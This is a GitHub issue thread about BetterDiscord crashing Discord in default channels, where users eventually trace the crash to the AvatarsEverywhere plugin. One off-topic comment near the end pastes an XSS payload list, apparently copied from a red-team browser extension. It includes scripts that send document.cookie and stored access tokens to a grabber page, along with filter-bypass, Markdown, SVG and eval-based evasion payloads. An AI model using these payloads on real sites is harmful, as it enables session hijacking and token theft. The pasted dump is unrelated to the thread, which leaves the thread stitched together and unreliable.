### ISSUE TITLE
[Bug] Discord Crashing

### ISSUE THREAD

**Issue by AmySakuraChan** [BetterDiscord/BetterDiscord#1312]
**Describe the Bug**
when clicking on specific servers or channels, discord keeps crashing, tried to reinstall better discord, but still happening

**Discord Version**

**Additional Context**

**Comment by maenDisease** [comment]
This is most likely a plugin issue rather than BetterDiscord, try asking in the BetterDiscord support server

**Comment by AmySakuraChan** [comment]
have not installed a new plugin recently and since this is happening :/

**Comment by SmolAlli** [comment]
installing new plugins doesn't lead to crashing. the plugins you already have will sometimes crash. 
bd server invite - https://betterdiscord.app/invite

**Comment by kxmpetentes** [comment]
BetterDiscord is crashing in default channels

**Comment by AmySakuraChan** [comment]
> 
after thinking about the issue, thats true, its the default channels

**Comment by afl300** [comment]
Have you tried reinstalling betterdiscord as sometimes it helps, if not, maybe try with addon if it fixes but these are some suggestion i can think of for now, the third one is not captiable with your system but this is an educated guess.

**Comment by kxmpetentes** [comment]
> Have you tried reinstalling betterdiscord as sometimes it helps, if not, maybe try with addon if it fixes but these are some suggestion i can think of for now, the third one is not captiable with your system but this is an educated guess.

I reinstalled discord and better discord and its still crashing in default channel's

**Comment by rauenzi** [comment]
Can you see if it still occurs after removing all plugins and reloading?

**Comment by Kermalis** [comment]
I was having this issue too for a month or two but I just got around to figuring out the issue. It didn't happen with all plugins removed. It turns out the culprit was `AvatarsEverywhere` v1.0.4 by `A user`. Disabling this stops the crash.

There are already issues here: https://github.com/abUwUser/BDPlugins/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc

**Comment by shreyanshu-69** [comment]
> Can you see if it still occurs after removing all plugins and reloading?

but you can't remove the plugins on nomal discord. Right?? can you give me the location where better discord folder is ? pls

**Comment by defineid** [comment]
aws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
Data grabber for XSS
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
XSS in HTML/Applications
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
XSS in Markdown
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
XSS in SVG (short)
<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
Bypass word blacklist with code evaluation
eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;

 Hack Tools - The all in one Red team browser extension for web pentesters
Ludovic COULON - Riadh BOUCHAHOUA
